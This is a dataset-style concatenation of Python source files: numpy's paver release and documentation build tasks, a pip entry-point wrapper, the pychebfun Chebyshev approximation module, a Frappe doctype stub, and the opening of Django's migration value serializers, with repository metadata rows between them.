    for stale_dir in (options.superpack.builddir, options.installers.releasedir):
        if os.path.exists(stale_dir):
            shutil.rmtree(stale_dir)
#---------------------
# Documentation tasks
#---------------------
@task
def html(options):
    """Build numpy documentation and put it into build/docs"""
    # Don't use paver html target because of numpy bootstrapping problems
    built_html = os.path.join("doc", options.sphinx.builddir, "html")
    if os.path.exists(built_html):
        shutil.rmtree(built_html)
    subprocess.check_call(["make", "html"], cwd="doc")
    destination = options.html.builddir
    if os.path.exists(destination):
        shutil.rmtree(destination)
    shutil.copytree(built_html, destination)
@task
def latex():
    """Build numpy documentation in latex format."""
    # Delegate to the sphinx Makefile in doc/.
    subprocess.check_call(["make", "latex"], cwd="doc")
@task
@needs('latex')
def pdf():
    """Build the user guide and reference manual PDFs and collect them
    in build_doc/pdf.

    Depends on the `latex` task for the sphinx latex sources.  The unused
    `sdir`/`bdir` locals of the original were removed.
    """
    bdir_latex = options.doc.bdir_latex
    destdir_pdf = options.doc.destdir_pdf
    def build_pdf():
        subprocess.check_call(["make", "all-pdf"], cwd=str(bdir_latex))
    # dry() honours paver's dry-run mode.
    dry("Build pdf doc", build_pdf)
    if os.path.exists(destdir_pdf):
        shutil.rmtree(destdir_pdf)
    os.makedirs(destdir_pdf)
    user = os.path.join(bdir_latex, "numpy-user.pdf")
    shutil.copy(user, os.path.join(destdir_pdf, "userguide.pdf"))
    ref = os.path.join(bdir_latex, "numpy-ref.pdf")
    shutil.copy(ref, os.path.join(destdir_pdf, "reference.pdf"))
#------------------
# Mac OS X targets
#------------------
def dmg_name(fullversion, pyver, osxver=None):
    """Return name for dmg installer.

    Notes
    -----
    Python 2.7 has two binaries, one for 10.3 (ppc, i386) and one for 10.6
    (i386, x86_64). All other Python versions at python.org at the moment
    have binaries for 10.3 only. The "macosx%s" part of the dmg name should
    correspond to the python.org naming scheme.
    """
    # assume that for the py2.7/osx10.6 build the deployment target is set
    # (should be done in the release script).
    if not osxver:
        osxver = os.environ.get('MACOSX_DEPLOYMENT_TARGET', '10.3')
    return "numpy-{0}-py{1}-python.org-macosx{2}.dmg".format(
        fullversion, pyver, osxver)
def macosx_version():
    """Return the (major, minor, micro) OS X version as strings,
    parsed from ``sw_vers`` output.

    Raises ValueError when not running on darwin.  Returns None when the
    version line cannot be found (unchanged from the original).
    """
    if not sys.platform == 'darwin':
        raise ValueError("Not darwin ??")
    st = subprocess.Popen(["sw_vers"], stdout=subprocess.PIPE)
    out = st.stdout.readlines()
    # Raw string: the original relied on '\s'/'\.' surviving as literal
    # backslash escapes, which is deprecated syntax.
    ver = re.compile(r"ProductVersion:\s+([0-9]+)\.([0-9]+)\.([0-9]+)")
    for line in out:
        if isinstance(line, bytes):
            # Python 3: pipe output is bytes; the str pattern needs text.
            line = line.decode('utf-8')
        m = ver.match(line)
        if m:
            return m.groups()
def mpkg_name(pyver):
    """Return the bdist_mpkg bundle name for the current OS X release."""
    # Renamed from `maj, min` to avoid shadowing the builtin min().
    major, minor = macosx_version()[:2]
    # Note that bdist_mpkg breaks this if building a dev version with a git
    # commit string attached. make_fullplatcomponents() in
    # bdist_mpkg/cmd_bdist_mpkg.py replaces '-' with '_', comment this out if
    # needed.
    return "numpy-%s-py%s-macosx%s.%s.mpkg" % (FULLVERSION, pyver, major, minor)
def _build_mpkg(pyver):
    """Run ``setup.py bdist_mpkg`` under the python.org framework Python
    for `pyver`, with LDFLAGS matching the target architectures."""
    # account for differences between Python 2.7.1 versions from python.org
    if os.environ.get('MACOSX_DEPLOYMENT_TARGET', None) == "10.6":
        ldflags = "-undefined dynamic_lookup -bundle -arch i386 -arch x86_64 -Wl,-search_paths_first"
    else:
        ldflags = "-undefined dynamic_lookup -bundle -arch i386 -arch ppc -Wl,-search_paths_first"
    # Also link against the local build directory.
    ldflags += " -L%s" % os.path.join(os.path.dirname(__file__), "build")
    sh("LDFLAGS='%s' %s setup.py bdist_mpkg" % (ldflags, " ".join(MPKG_PYTHON[pyver])))
@task
def simple_dmg():
    """Build a dmg containing just the mpkg (no docs), for Python 2.6."""
    pyver = "2.6"
    src_dir = "dmg-source"
    # Clean the source dir
    if os.path.exists(src_dir):
        shutil.rmtree(src_dir)
    os.makedirs(src_dir)
    # Build the mpkg
    clean()
    _build_mpkg(pyver)
    # Build the dmg
    shutil.copytree(os.path.join("dist", mpkg_name(pyver)),
                    os.path.join(src_dir, mpkg_name(pyver)))
    _create_dmg(pyver, src_dir, "NumPy Universal %s" % FULLVERSION)
@task
def bdist_mpkg(options):
    """Build the OS X mpkg installer (cleans the tree first)."""
    call_task("clean")
    try:
        pyver = options.bdist_mpkg.python_version
    except AttributeError:
        # Fall back to the top-level option when the task-specific one is
        # missing.
        pyver = options.python_version
    _build_mpkg(pyver)
def _create_dmg(pyver, src_dir, volname=None):
    """Create the installer dmg image from `src_dir` via hdiutil."""
    image_name = dmg_name(FULLVERSION, pyver)
    if os.path.exists(image_name):
        os.remove(image_name)
    hdiutil_cmd = ["hdiutil", "create", image_name, "-srcdir", src_dir]
    if volname:
        hdiutil_cmd += ["-volname", "'%s'" % volname]
    sh(" ".join(hdiutil_cmd))
@task
@cmdopts([("python-version=", "p", "python version")])
def dmg(options):
    """Build the OS X dmg installer: the mpkg plus the pdf docs.

    The previous bare ``except:`` swallowed every error in the option
    lookup (including typos); only a missing option should trigger the
    DEFAULT_PYTHON fallback, matching bdist_mpkg above.
    """
    try:
        pyver = options.dmg.python_version
    except AttributeError:
        pyver = DEFAULT_PYTHON
    idirs = options.installers.installersdir
    # Check if docs exist. If not, say so and quit.
    ref = os.path.join(options.doc.destdir_pdf, "reference.pdf")
    user = os.path.join(options.doc.destdir_pdf, "userguide.pdf")
    if (not os.path.exists(ref)) or (not os.path.exists(user)):
        import warnings
        warnings.warn("Docs need to be built first! Can't find them.")
    # Build the mpkg package
    call_task("clean")
    _build_mpkg(pyver)
    macosx_installer_dir = "tools/numpy-macosx-installer"
    dmg = os.path.join(macosx_installer_dir, dmg_name(FULLVERSION, pyver))
    if os.path.exists(dmg):
        os.remove(dmg)
    # Clean the image source
    content = os.path.join(macosx_installer_dir, 'content')
    if os.path.exists(content):
        shutil.rmtree(content)
    os.makedirs(content)
    # Copy mpkg into image source
    mpkg_source = os.path.join("dist", mpkg_name(pyver))
    mpkg_target = os.path.join(content, "numpy-%s-py%s.mpkg" % (FULLVERSION, pyver))
    shutil.copytree(mpkg_source, mpkg_target)
    # Copy docs into image source
    pdf_docs = os.path.join(content, "Documentation")
    if os.path.exists(pdf_docs):
        shutil.rmtree(pdf_docs)
    os.makedirs(pdf_docs)
    shutil.copy(user, os.path.join(pdf_docs, "userguide.pdf"))
    shutil.copy(ref, os.path.join(pdf_docs, "reference.pdf"))
    # Build the dmg
    cmd = ["./new-create-dmg", "--pkgname", os.path.basename(mpkg_target),
           "--volname", "numpy", os.path.basename(dmg), "./content"]
    st = subprocess.check_call(cmd, cwd=macosx_installer_dir)
    # Stage the result into the installers directory.
    source = dmg
    target = os.path.join(idirs, os.path.basename(dmg))
    if not os.path.exists(os.path.dirname(target)):
        os.makedirs(os.path.dirname(target))
    shutil.copy(source, target)
#--------------------------
# Source distribution stuff
#--------------------------
def tarball_name(type='gztar'):
    """Return the sdist archive filename for the given format.

    `type` (name kept for API compatibility despite shadowing the
    builtin) is either 'gztar' or 'zip'.
    """
    root = 'numpy-%s' % FULLVERSION
    if type == 'zip':
        return root + '.zip'
    if type == 'gztar':
        return root + '.tar.gz'
    raise ValueError("Unknown type %s" % type)
@task
def sdist(options):
    """Build source tarball + zip and copy them into the installers dir."""
    # First clean the repo and update submodules (for up-to-date doc html theme
    # and Sphinx extensions)
    sh('git clean -xdf')
    sh('git submodule init')
    sh('git submodule update')
    # To be sure to bypass paver when building sdist... paver + numpy.distutils
    # do not play well together.
    # Cython is run over all Cython files in setup.py, so generated C files
    # will be included.
    sh('python setup.py sdist --formats=gztar,zip')
    # Copy the superpack into installers dir
    idirs = options.installers.installersdir
    if not os.path.exists(idirs):
        os.makedirs(idirs)
    for t in ['gztar', 'zip']:
        source = os.path.join('dist', tarball_name(t))
        target = os.path.join(idirs, tarball_name(t))
        shutil.copy(source, target)
def compute_md5(idirs):
    """Return '<md5hex> <basename>' lines for every file in `idirs`.

    Files are read in binary mode: the original opened them in text
    mode, which leaked the handle and fed str (not bytes) to hashlib
    under Python 3.
    """
    released = paver.path.path(idirs).listdir()
    checksums = []
    for fpath in sorted(released):
        with open(fpath, 'rb') as fin:
            m = md5(fin.read())
        checksums.append('%s %s' % (m.hexdigest(), os.path.basename(fpath)))
    return checksums
def compute_sha256(idirs):
    """Return '<sha256hex> <basename>' lines for every file in `idirs`.

    Stronger checksum so a gpg-signed README.txt containing the sums can
    be used to verify the binaries instead of signing every binary.
    Files are read in binary mode (the original used text mode and
    leaked the handle).
    """
    released = paver.path.path(idirs).listdir()
    checksums = []
    for fpath in sorted(released):
        with open(fpath, 'rb') as fin:
            m = sha256(fin.read())
        checksums.append('%s %s' % (m.hexdigest(), os.path.basename(fpath)))
    return checksums
def write_release_task(options, filename='NOTES.txt'):
    """Copy the release notes to `filename` and append MD5/SHA256
    checksum sections for everything in the installers directory."""
    idirs = options.installers.installersdir
    source = paver.path.path(RELEASE_NOTES)
    target = paver.path.path(filename)
    if target.exists():
        target.remove()
    source.copy(target)
    # Append the checksum sections; a context manager guarantees the file
    # is flushed and closed (the original handle was never closed).
    with open(str(target), 'a') as ftarget:
        ftarget.writelines("""
Checksums
=========
MD5
~~~
""")
        ftarget.writelines(['%s\n' % c for c in compute_md5(idirs)])
        ftarget.writelines("""
SHA256
~~~~~~
""")
        ftarget.writelines(['%s\n' % c for c in compute_sha256(idirs)])
def write_log_task(options, filename='Changelog'):
    """Dump the git log between LOG_START and LOG_END into `filename`."""
    proc = subprocess.Popen(
        ['git', 'log', '--no-merges', '--use-mailmap',
         '%s..%s' % (LOG_START, LOG_END)],
        stdout=subprocess.PIPE)
    out = proc.communicate()[0]
    with open(filename, 'w') as changelog:
        changelog.writelines(out)
@task
def write_release(options):
    """Write NOTES.txt (release notes + checksums) in the current dir."""
    write_release_task(options)
@task
def write_log(options):
    """Write the Changelog in the current dir."""
    write_log_task(options)
@task
def write_release_and_log(options):
    """Write NOTES.txt and Changelog into the release directory."""
    rdir = options.installers.releasedir
    write_release_task(options, os.path.join(rdir, 'NOTES.txt'))
    write_log_task(options, os.path.join(rdir, 'Changelog'))
| 33.996885 | 101 | 0.642262 |
ace0a7229f2074dc423dff8ca0d1b86b38c30608 | 466 | py | Python | venv/Scripts/pip3-script.py | PaulinaVF/Snake-Search-Algorithms | 94e8b185a2c3464b49614411e848cab2d3e051ec | [
"Apache-2.0"
] | null | null | null | venv/Scripts/pip3-script.py | PaulinaVF/Snake-Search-Algorithms | 94e8b185a2c3464b49614411e848cab2d3e051ec | [
"Apache-2.0"
] | null | null | null | venv/Scripts/pip3-script.py | PaulinaVF/Snake-Search-Algorithms | 94e8b185a2c3464b49614411e848cab2d3e051ec | [
"Apache-2.0"
] | null | null | null | #!"C:\Users\pauli\Desktop\UPAEP\5 SEMESTRE\Artificial Intelligence\Programa\SearchAlgorithms\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    # Generated setuptools entry-point wrapper: strip the "-script.py" /
    # ".exe" suffix from argv[0], then dispatch to pip's registered
    # console_scripts entry point and exit with its return value.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')()
    )
| 35.846154 | 117 | 0.690987 |
ace0a7a579a0bfdfc42638ba9d60a1114d95308d | 13,599 | py | Python | pychebfun/chebfun.py | shyams2/pychebfun | 0c1efee54829457b9e1b0d6c34259af6c002e105 | [
"BSD-3-Clause"
] | null | null | null | pychebfun/chebfun.py | shyams2/pychebfun | 0c1efee54829457b9e1b0d6c34259af6c002e105 | [
"BSD-3-Clause"
] | null | null | null | pychebfun/chebfun.py | shyams2/pychebfun | 0c1efee54829457b9e1b0d6c34259af6c002e105 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# coding: UTF-8
"""
Chebfun module
==============
.. moduleauthor :: Chris Swierczewski <cswiercz@gmail.com>
.. moduleauthor :: Olivier Verdier <olivier.verdier@gmail.com>
.. moduleauthor :: Gregory Potter <ghpotter@gmail.com>
"""
from __future__ import division
import operator
import numpy as np
from scipy import linalg
from scipy.interpolate import BarycentricInterpolator as Bary
import numpy.polynomial as poly
import scipy.fftpack as fftpack
from .polyfun import Polyfun, cast_scalar
class Chebfun(Polyfun):
"""
Eventually set this up so that a Chebfun is a collection of Chebfuns. This
will enable piecewise smooth representations al la Matlab Chebfun v2.0.
"""
# ----------------------------------------------------------------
# Standard construction class methods.
# ----------------------------------------------------------------
@classmethod
def get_default_domain(self, domain=None):
if domain is None:
return [-1., 1.]
else:
return domain
@classmethod
def identity(self, domain=[-1., 1.]):
"""
The identity function x -> x.
"""
return self.from_data([domain[1],domain[0]], domain)
@classmethod
def basis(self, n):
"""
Chebyshev basis functions T_n.
"""
if n == 0:
return self(np.array([1.]))
vals = np.ones(n+1)
vals[1::2] = -1
return self(vals)
# ----------------------------------------------------------------
# Integration and differentiation
# ----------------------------------------------------------------
def sum(self):
"""
Evaluate the integral over the given interval using
Clenshaw-Curtis quadrature.
"""
ak = self.coefficients()
ak2 = ak[::2]
n = len(ak2)
Tints = 2/(1-(2*np.arange(n))**2)
val = np.sum((Tints*ak2.T).T, axis=0)
a_, b_ = self.domain()
return 0.5*(b_-a_)*val
def integrate(self):
"""
Return the object representing the primitive of self over the domain. The
output starts at zero on the left-hand side of the domain.
"""
coeffs = self.coefficients()
a,b = self.domain()
int_coeffs = 0.5*(b-a)*poly.chebyshev.chebint(coeffs)
antiderivative = self.from_coeff(int_coeffs, domain=self.domain())
return antiderivative - antiderivative(a)
def differentiate(self, n=1):
"""
n-th derivative, default 1.
"""
ak = self.coefficients()
a_, b_ = self.domain()
for _ in range(n):
ak = self.differentiator(ak)
return self.from_coeff((2./(b_-a_))**n*ak, domain=self.domain())
# ----------------------------------------------------------------
# Roots
# ----------------------------------------------------------------
def roots(self):
"""
Utilises Boyd's O(n^2) recursive subdivision algorithm. The chebfun
is recursively subsampled until it is successfully represented to
machine precision by a sequence of piecewise interpolants of degree
100 or less. A colleague matrix eigenvalue solve is then applied to
each of these pieces and the results are concatenated.
See:
J. P. Boyd, Computing zeros on a real interval through Chebyshev
expansion and polynomial rootfinding, SIAM J. Numer. Anal., 40
(2002), pp. 1666–1682.
"""
if self.size() == 1:
return np.array([])
elif self.size() <= 100:
ak = self.coefficients()
v = np.zeros_like(ak[:-1])
v[1] = 0.5
C1 = linalg.toeplitz(v)
C2 = np.zeros_like(C1)
C1[0,1] = 1.
C2[-1,:] = ak[:-1]
C = C1 - .5/ak[-1] * C2
eigenvalues = linalg.eigvals(C)
roots = [eig.real for eig in eigenvalues
if np.allclose(eig.imag,0,atol=1e-10)
and np.abs(eig.real) <=1]
scaled_roots = self._ui_to_ab(np.array(roots))
return scaled_roots
else:
# divide at a close-to-zero split-point
split_point = self._ui_to_ab(0.0123456789)
return np.concatenate(
(self.restrict([self._domain[0],split_point]).roots(),
self.restrict([split_point,self._domain[1]]).roots())
)
def min(self):
"""
Returns the global minimum in the domain and
its location for the chebfun
"""
# Finding the roots for f'(x):
try:
r = self.differentiate().roots()
except:
# Check if it's a linear function:
if(np.product((self.differentiate())(self.domain())) < 0):
x1, x2 = self.domain()
y1, y2 = ((self.differentiate())(self.domain()))
# Finding slope:
m = (y2 - y1) / (x2 - x1)
r = np.array([x1 - y1 / m])
else:
# Initializing an empty array:
r = np.array([])
# Checking in the interior of the function:
# Initializing with an arbitrary high enough value
miny_int = 1e300
minx_int = 0
# Checking that the roots vector isn't empty:
if(r.size != 0):
minx_int = r[np.argmin(self(r))]
miny_int = self(np.array([minx_int]))[0]
# Checking on the boundaries:
minx_bound = (self.domain())[np.argmin(self(self.domain()))]
miny_bound = self(np.array([minx_bound]))[0]
# Finding minimum across boundary and interior:
imin = np.argmin([miny_int, miny_bound])
if(imin == 0):
return miny_int, minx_int
else:
return miny_bound, minx_bound
def max(self):
"""
Returns the global maximum in domain and
its location for the chebfun
"""
# Finding the roots for f'(x):
try:
r = self.differentiate().roots()
except:
# Check if it's a linear function:
if(np.product((self.differentiate())(self.domain())) < 0):
x1, x2 = self.domain()
y1, y2 = ((self.differentiate())(self.domain()))
# Finding slope:
m = (y2 - y1) / (x2 - x1)
r = np.array([x1 - y1 / m])
else:
# Initializing an empty array:
r = np.array([])
# Checking in the interior of the function:
# Initializing with an arbitrary low enough value
maxy_int = 1e300
maxx_int = 0
# Checking that the roots vector isn't empty:
if(r.size != 0):
maxx_int = r[np.argmax(self(r))]
maxy_int = self(np.array([maxx_int]))[0]
# Checking on the boundaries:
maxx_bound = (self.domain())[np.argmax(self(self.domain()))]
maxy_bound = self(np.array([maxx_bound]))[0]
# Finding maximum across boundary and interior:
imax = np.argmax([maxy_int, maxy_bound])
if(imax == 0):
return maxy_int, maxx_int
else:
return maxy_bound, maxx_bound
# ----------------------------------------------------------------
# Interpolation and evaluation (go from values to coefficients)
# ----------------------------------------------------------------
@classmethod
def interpolation_points(self, N):
"""
N Chebyshev points in [-1, 1], boundaries included
"""
if N == 1:
return np.array([0.])
return np.cos(np.arange(N)*np.pi/(N-1))
@classmethod
def sample_function(self, f, N):
"""
Sample a function on N+1 Chebyshev points.
"""
x = self.interpolation_points(N+1)
return f(x)
@classmethod
def polyfit(self, sampled):
"""
Compute Chebyshev coefficients for values located on Chebyshev points.
sampled: array; first dimension is number of Chebyshev points
"""
asampled = np.asarray(sampled)
if len(asampled) == 1:
return asampled
evened = even_data(asampled)
coeffs = dct(evened)
return coeffs
@classmethod
def polyval(self, chebcoeff):
    """
    Compute the interpolation values at Chebyshev points from the
    Chebyshev coefficients *chebcoeff* (inverse of polyfit).
    """
    N = len(chebcoeff)
    if N == 1:
        return chebcoeff
    # Halve all coefficients except the first and last (DCT-I weighting),
    # then invert via an inverse FFT of the even extension.
    data = even_data(chebcoeff) / 2
    data[0] *= 2
    data[N - 1] *= 2
    fftdata = 2 * (N - 1) * fftpack.ifft(data, axis=0)
    complex_values = fftdata[:N]
    # Keep the result real when the input coefficients were real.
    if np.isrealobj(chebcoeff):
        return np.real(complex_values)
    return complex_values
@classmethod
def interpolator(self, x, values):
    """
    Return a barycentric interpolating polynomial (vector coefficients)
    through *values* at the Chebyshev points *x*.
    """
    # Hack: seed the barycentric interpolator, then overwrite its weights
    # with the closed-form Chebyshev-Lobatto weights (.5, -1, 1, -1, ...).
    p = Bary([0.])
    n = len(values)
    weights = np.ones(n)
    weights[0] = 0.5
    weights[1::2] = -1
    weights[-1] *= 0.5
    p.wi = weights
    p.xi = x
    p.set_yi(values)
    return p
# ----------------------------------------------------------------
# Helper for differentiation.
# ----------------------------------------------------------------
@classmethod
def differentiator(self, A):
    """Differentiate a set of Chebyshev polynomial expansion
    coefficients
    Originally from http://www.scientificpython.net/pyblog/chebyshev-differentiation
    + (lots of) bug fixing + pythonisation

    A: coefficient array; extra trailing dimensions (if any) are treated
    as independent series. Returns the derivative's coefficient array.
    """
    m = len(A)
    # Scaled coefficients SA[k] = 2*k*A[k] (factor from the Chebyshev
    # derivative recurrence).
    SA = (A.T* 2*np.arange(m)).T
    DA = np.zeros_like(A)
    if m == 1: # constant
        return np.zeros_like(A[0:1])
    if m == 2: # linear
        return A[1:2,]
    # Seed the two highest-order derivative coefficients.
    DA[m-3:m-1,] = SA[m-2:m,]
    # Backward recurrence D[k] = S[k+1] + D[k+2], filled two rows per step.
    for j in range(m//2 - 1):
        k = m-3-2*j
        DA[k] = SA[k+1] + DA[k+2]
        DA[k-1] = SA[k] + DA[k+1]
    # The zeroth Chebyshev coefficient carries an extra factor of 1/2.
    DA[0] = (SA[1] + DA[2])*0.5
    return DA
# ----------------------------------------------------------------
# General utilities
# ----------------------------------------------------------------
def even_data(data):
    """
    Construct the Extended Data Vector (the even extension of the
    original function's samples).

    Return: array of length 2(N-1).
    For instance, [0,1,2,3,4] --> [0,1,2,3,4,3,2,1]
    """
    # Mirror the interior samples (drop both endpoints of the reflection).
    mirrored = data[-2:0:-1]
    return np.concatenate([data, mirrored])
def dct(data):
    """
    Compute the (scaled) DCT of *data* using the FFT.

    Expects the even-extended vector produced by even_data(); returns the
    first N+1 spectrum bins, with the endpoint bins halved.
    """
    half = len(data) // 2
    spectrum = fftpack.fft(data, axis=0)[:half + 1]
    spectrum /= half
    # Endpoint coefficients carry a factor of 1/2 in the DCT-I convention.
    spectrum[0] /= 2.
    spectrum[-1] /= 2.
    # Real input yields a real transform (drop the zero imaginary part).
    if np.isrealobj(data):
        return np.real(spectrum)
    return spectrum
# ----------------------------------------------------------------
# Add overloaded operators
# ----------------------------------------------------------------
def _add_operator(cls, op):
    """Attach the dunder for binary operator *op* (e.g. __mul__) to *cls*."""
    def method(self, other):
        # Operands must live on the same domain to be combined pointwise.
        if not self.same_domain(other):
            raise self.DomainMismatch(self.domain(), other.domain())
        return self.from_function(
            lambda x: op(self(x).T, other(x).T).T,
            domain=self.domain(),
        )
    # cast_scalar lets plain numbers participate by promoting them first.
    cast_method = cast_scalar(method)
    dunder = '__' + op.__name__ + '__'
    cast_method.__name__ = dunder
    cast_method.__doc__ = "operator {}".format(dunder)
    setattr(cls, dunder, cast_method)
def rdiv(a, b):
    """Reflected division: return *b* divided by *a* (used for __rdiv__)."""
    return b / a
# Register __mul__, __truediv__, __pow__ and __rdiv__ on Polyfun via the
# generic operator factory above.
for _op in [operator.mul, operator.truediv, operator.pow, rdiv]:
    _add_operator(Polyfun, _op)
# ----------------------------------------------------------------
# Add numpy ufunc delegates
# ----------------------------------------------------------------
def _add_delegate(ufunc, nonlinear=True):
    """Attach a Polyfun method named after *ufunc* that applies it pointwise."""
    def method(self):
        return self.from_function(lambda x: ufunc(self(x)), domain=self.domain())
    method.__name__ = ufunc.__name__
    method.__doc__ = "delegate for numpy's ufunc {}".format(ufunc.__name__)
    setattr(Polyfun, ufunc.__name__, method)
# Following list generated from:
# https://github.com/numpy/numpy/blob/master/numpy/core/code_generators/generate_umath.py
# Each ufunc below becomes a Polyfun method of the same name (e.g. f.sin()).
for func in [np.arccos, np.arccosh, np.arcsin, np.arcsinh, np.arctan, np.arctanh, np.cos, np.sin, np.tan, np.cosh, np.sinh, np.tanh, np.exp, np.exp2, np.expm1, np.log, np.log2, np.log1p, np.sqrt, np.ceil, np.trunc, np.fabs, np.floor, ]:
    _add_delegate(func)
# ----------------------------------------------------------------
# General Aliases
# ----------------------------------------------------------------
## chebpts = interpolation_points
# ----------------------------------------------------------------
# Constructor inspired by the Matlab version
# ----------------------------------------------------------------
def chebfun(f=None, domain=None, N=None, chebcoeff=None,):
    """
    Create a Chebyshev polynomial approximation of the function $f$ on the
    interval :math:`[-1, 1]` (or *domain*).

    :param callable f: Python, Numpy, or Sage function; may also be a
        Polyfun instance, a scalar, or an iterable of interpolation values
    :param list domain: (default = [-1, 1]) interval of approximation
    :param int N: (default = None) specify number of interpolating points
    :param np.array chebcoeff: (default = np.array(0)) specify the coefficients
    :raises TypeError: if *f* cannot be interpreted in any of those ways
    """
    # Avoid a mutable default argument: [-1, 1] is built fresh per call.
    if domain is None:
        domain = [-1, 1]
    # Chebyshev coefficients
    if chebcoeff is not None:
        return Chebfun.from_coeff(chebcoeff, domain)
    # another instance
    if isinstance(f, Polyfun):
        return Chebfun.from_fun(f)
    # callable
    if callable(f):
        return Chebfun.from_function(f, domain, N)
    # from here on, assume that f is None, or iterable
    if np.isscalar(f):
        f = [f]
    try:
        iter(f)  # interpolation values provided
    except TypeError:
        pass
    else:
        return Chebfun(f, domain)
    raise TypeError('Impossible to initialise the object from an object of type {}'.format(type(f)))
| 31.479167 | 236 | 0.536804 |
ace0a7bc42f5952dc3c0ff3f85be3a28d2d45e2e | 257 | py | Python | virtualevent/virtual_event/doctype/dell_trivia_qna/dell_trivia_qna.py | eclecticmiraclecat/virtualevent | a7deb43aee1746e379714c1c242d24e703412602 | [
"MIT"
] | null | null | null | virtualevent/virtual_event/doctype/dell_trivia_qna/dell_trivia_qna.py | eclecticmiraclecat/virtualevent | a7deb43aee1746e379714c1c242d24e703412602 | [
"MIT"
] | null | null | null | virtualevent/virtual_event/doctype/dell_trivia_qna/dell_trivia_qna.py | eclecticmiraclecat/virtualevent | a7deb43aee1746e379714c1c242d24e703412602 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2020, ERP-X and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
from frappe.model.document import Document
class DellTriviaQnA(Document):
    """Frappe DocType controller for "Dell Trivia QnA"; no custom behavior."""
    pass
| 23.363636 | 49 | 0.770428 |
ace0a860c447ca44f9aa2d3bc79f45af389fb8c6 | 12,271 | py | Python | venv/Lib/site-packages/django/db/migrations/serializer.py | Rudeus3Greyrat/admin-management | 7e81d2b1908afa3ea57a82c542c9aebb1d0ffd23 | [
"MIT"
] | 14 | 2019-05-01T05:03:20.000Z | 2022-01-08T03:18:05.000Z | venv/Lib/site-packages/django/db/migrations/serializer.py | Rudeus3Greyrat/admin-management | 7e81d2b1908afa3ea57a82c542c9aebb1d0ffd23 | [
"MIT"
] | 12 | 2020-02-12T00:25:14.000Z | 2022-03-11T23:48:53.000Z | venv/Lib/site-packages/django/db/migrations/serializer.py | Rudeus3Greyrat/admin-management | 7e81d2b1908afa3ea57a82c542c9aebb1d0ffd23 | [
"MIT"
] | 8 | 2019-05-19T11:24:28.000Z | 2022-02-16T20:19:30.000Z | import builtins
import collections.abc
import datetime
import decimal
import enum
import functools
import math
import re
import types
import uuid
from collections import OrderedDict
from django.conf import SettingsReference
from django.db import models
from django.db.migrations.operations.base import Operation
from django.db.migrations.utils import COMPILED_REGEX_TYPE, RegexObject
from django.utils.functional import LazyObject, Promise
from django.utils.timezone import utc
from django.utils.version import get_docs_version
class BaseSerializer:
    """Common interface for migration-value serializers.

    Subclasses implement serialize() and return a
    ``(source_string, imports_set)`` pair.
    """
    def __init__(self, value):
        self.value = value

    def serialize(self):
        raise NotImplementedError('Subclasses of BaseSerializer must implement the serialize() method.')
class BaseSequenceSerializer(BaseSerializer):
    """Serialize a sequence by serializing each item and joining them."""
    def _format(self):
        raise NotImplementedError('Subclasses of BaseSequenceSerializer must implement the _format() method.')

    def serialize(self):
        imports = set()
        parts = []
        for item in self.value:
            item_string, item_imports = serializer_factory(item).serialize()
            imports.update(item_imports)
            parts.append(item_string)
        # _format() supplies the literal shape, e.g. "[%s]" or "{%s}".
        template = self._format()
        return template % ", ".join(parts), imports
class BaseSimpleSerializer(BaseSerializer):
    """Serialize values whose repr() round-trips (bool, int, str, bytes, None)."""
    def serialize(self):
        return repr(self.value), set()
class DateTimeSerializer(BaseSerializer):
    """For datetime.*, except datetime.datetime."""
    def serialize(self):
        # repr() of date/time/timedelta round-trips, given `import datetime`.
        return repr(self.value), {'import datetime'}
class DatetimeDatetimeSerializer(BaseSerializer):
    """For datetime.datetime."""
    def serialize(self):
        # Normalize any non-UTC aware datetime to UTC so migrations are stable.
        if self.value.tzinfo is not None and self.value.tzinfo != utc:
            self.value = self.value.astimezone(utc)
        required = {"import datetime"}
        if self.value.tzinfo is not None:
            required.add("from django.utils.timezone import utc")
        # repr() renders the tzinfo as '<UTC>'; swap in the imported name.
        return repr(self.value).replace('<UTC>', 'utc'), required
class DecimalSerializer(BaseSerializer):
    """Serialize decimal.Decimal via its repr(), e.g. Decimal('1.5')."""
    def serialize(self):
        return repr(self.value), {"from decimal import Decimal"}
class DeconstructableSerializer(BaseSerializer):
    """Serialize any object exposing Django's deconstruct() protocol."""

    @staticmethod
    def serialize_deconstructed(path, args, kwargs):
        """Render `path(*args, **kwargs)` as source plus required imports."""
        name, imports = DeconstructableSerializer._serialize_path(path)
        pieces = []
        for arg in args:
            arg_string, arg_imports = serializer_factory(arg).serialize()
            pieces.append(arg_string)
            imports.update(arg_imports)
        # Keyword arguments are sorted for deterministic output.
        for kw, arg in sorted(kwargs.items()):
            arg_string, arg_imports = serializer_factory(arg).serialize()
            imports.update(arg_imports)
            pieces.append("%s=%s" % (kw, arg_string))
        return "%s(%s)" % (name, ", ".join(pieces)), imports

    @staticmethod
    def _serialize_path(path):
        """Split a dotted path into (rendered name, imports)."""
        module, name = path.rsplit(".", 1)
        if module == "django.db.models":
            # Migration files always do `from django.db import models`.
            return "models.%s" % name, {"from django.db import models"}
        return path, {"import %s" % module}

    def serialize(self):
        return self.serialize_deconstructed(*self.value.deconstruct())
class DictionarySerializer(BaseSerializer):
    """Serialize a dict as a literal with deterministic (sorted-key) order."""
    def serialize(self):
        imports = set()
        entries = []
        for key, val in sorted(self.value.items()):
            k_string, k_imports = serializer_factory(key).serialize()
            v_string, v_imports = serializer_factory(val).serialize()
            imports.update(k_imports)
            imports.update(v_imports)
            entries.append("%s: %s" % (k_string, v_string))
        return "{%s}" % ", ".join(entries), imports
class EnumSerializer(BaseSerializer):
    """Serialize an enum member as module.EnumClass(value)."""
    def serialize(self):
        enum_class = type(self.value)
        module = enum_class.__module__
        # The member is reconstructed from its underlying .value.
        v_string, v_imports = serializer_factory(self.value.value).serialize()
        imports = {'import %s' % module}
        imports.update(v_imports)
        return "%s.%s(%s)" % (module, enum_class.__name__, v_string), imports
class FloatSerializer(BaseSimpleSerializer):
    """Like BaseSimpleSerializer, but nan/inf need the float("...") spelling
    because their repr() does not round-trip."""
